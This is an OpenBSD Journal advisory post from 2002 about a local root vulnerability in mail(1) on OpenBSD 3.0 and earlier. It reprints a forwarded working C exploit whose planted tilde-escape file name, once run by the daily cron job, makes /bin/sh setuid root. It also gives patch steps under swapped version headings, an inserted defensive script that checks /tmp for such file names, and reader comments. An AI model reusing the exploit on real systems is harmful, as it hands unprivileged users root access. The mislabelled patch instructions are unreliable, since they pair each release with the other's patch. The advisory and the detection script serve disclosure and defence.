OpenBSD Journal

Local root compromise in OpenBSD 3.0 and earlier

Contributed by Dengue from the security dept.

Bill Schaub writes:
"The mail(1) program can be made to execute arbitrary code in non-interactive mode. This can be exploited using cron and the system startup scripts (by any local user with no privs). A patch and an advisory are available on the advisory page.

The 2.9 patch is at ftp://ftp.openbsd.org/pub/OpenBSD/patches/2.9/common/023_mail.patch and the 3.0 patch is at ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.0/common/018_mail.patch

The fix has also been applied to the stable branches."

There is an exploit for this in the wild, from ViPER:


Subject: 2.9 3.0 local root exploit worth posting ;)
Date: Fri, 12 Apr 2002 16:05:55 +0200 (CEST)
From: ViPER / DMRT
To: webmaster@deadly.org
CC: ghost@dmrt.net

http://www.securitydatabase.net/forum/viewtopic.php?TopicID=3935#8314
http://www.bsdaemon.be/article.php?sid=302&mode=thread&order=0

/*
 * (c) 2002 venglin@freebsd.lublin.pl
 *
 * OpenBSD 3.0 (before 08 Apr 2002)
 * /etc/security + /usr/bin/mail local root exploit
 *
 * Run the exploit and wait for /etc/daily executed from crontab.
 * /bin/sh will be suid root next day morning.
 *
 * Credit goes to urbanek@openbsd.cz for discovering vulnerability.
 *
 */

#include <fcntl.h>
#include <unistd.h>

int main(void)
{
	int fd;

	chdir("/tmp");
	fd = open(" ~!chmod +s `perl -e 'print \"5714215115657163150\"'` ",
	    O_CREAT|O_WRONLY, 04777);

	if (fd != -1)
		close(fd);
}

OpenBSD v3.0

cd /usr/src
ncftpget ftp://ftp.openbsd.org/pub/OpenBSD/patches/2.9/common/023_mail.patch
patch -p0 < 023_mail.patch
cd usr.bin/mail
make cleandir
make obj
make depend
make && make install

OpenBSD v2.9

cd /usr/src
ncftpget ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.0/common/018_mail.patch
patch -p0 < 018_mail.patch
cd usr.bin/mail
make cleandir
make obj
make depend
make && make install

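The following script is an added example; it is not part of the article, of the advisory, or of the forwarded mail above. It does two things a defender wants after reading this page: it applies the mail(1) patch that matches the running release, using the release-to-patch mapping given in Bill Schaub's note (2.9 gets 023_mail.patch, 3.0 gets 018_mail.patch), and it lists entries in a world-writable directory such as /tmp whose names begin with a tilde escape, which is the shape of file name the exploit above plants for the daily security run to hand to mail(1). It assumes the system source tree is at /usr/src (the second argument overrides it) and uses ftp(1) from the base system for the download in place of the ncftpget used in the mail.

```shell
#!/bin/sh
# Added example, not from the article or the forwarded mail.
# Assumes /usr/src holds the system sources and ftp(1) from the base
# system is available for the download.

# mail_patch_url RELEASE: print the patch URL for RELEASE, or fail with
# status 1 when the advisory lists no patch for that release.
mail_patch_url() {
	case "$1" in
	2.9) echo "ftp://ftp.openbsd.org/pub/OpenBSD/patches/2.9/common/023_mail.patch" ;;
	3.0) echo "ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.0/common/018_mail.patch" ;;
	*)   return 1 ;;
	esac
}

# apply_mail_patch RELEASE [SRCDIR]: fetch, apply and rebuild mail(1).
# Every step is chained with && so that a rejected hunk never leads to
# "make install" of an unpatched mail(1).
apply_mail_patch() {
	rel="$1"; src="${2:-/usr/src}"
	url=$(mail_patch_url "$rel") || {
		echo "no mail(1) patch listed for OpenBSD $rel" >&2
		return 1
	}
	file=$(basename "$url")
	# -p0: paths inside the patch are relative to /usr/src
	cd "$src" &&
		ftp -o "$file" "$url" &&
		patch -p0 < "$file" &&
		cd usr.bin/mail &&
		make cleandir && make obj && make depend && make && make install
}

# tilde_names DIR: print direct children of DIR whose names start with
# optional blanks followed by '~'. Returns 1 when any were found (so a
# cron job can alert on it) and 0 when the directory is clean.
tilde_names() {
	find "$1" -mindepth 1 -maxdepth 1 -print 2>/dev/null |
		sed 's,.*/,,' |
		grep -E '^[[:space:]]*~' && return 1
	return 0
}

# Usage, run as root on the affected host:
#   apply_mail_patch "$(uname -r)"
#   tilde_names /tmp || echo "tilde-escape file names found in /tmp"
```

The check in tilde_names is a stop-gap for the window between reading the advisory and rebuilding mail(1); once the patched mail(1) is installed, the daily run no longer interprets such names as escapes, and the check only serves to spot leftover files from an earlier attempt.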



Comments
  1. By Anonymous Coward

    Isn't this like the third local root exploit within 6 months? I am glad that we are getting told about each of these exploits, don't get me wrong, but what has happened in the last couple of months to make OBSD so "vulnerable"? Has there been less testing between releases? OBSD's three local root exploits in 6 months is WAY better than Redhat's crack-of-the-week; I am just wondering if I/we are slacking on bug finding/reporting.

  2. By Chris (http://www.dejection.org.uk/)

    Ahh shit happens. Everyone makes mistakes.

    Just comparing OpenBSD to anything else, at least we know about this and have a fix for it, as I'm sure we wouldn't if it was an MS OS.

    Follow NTbugtraq and you'll see what I mean.

    I have to use both systems and I can tell you I'm a million times happier using OpenBSD on my systems!

  3. By Anonymous Coward

    At least it's not a remote hole.

  4. By bengt kleberg (eleberg@cbe.ericsson.se)

    I.e., would a change to postfix have avoided this problem?

    bengt
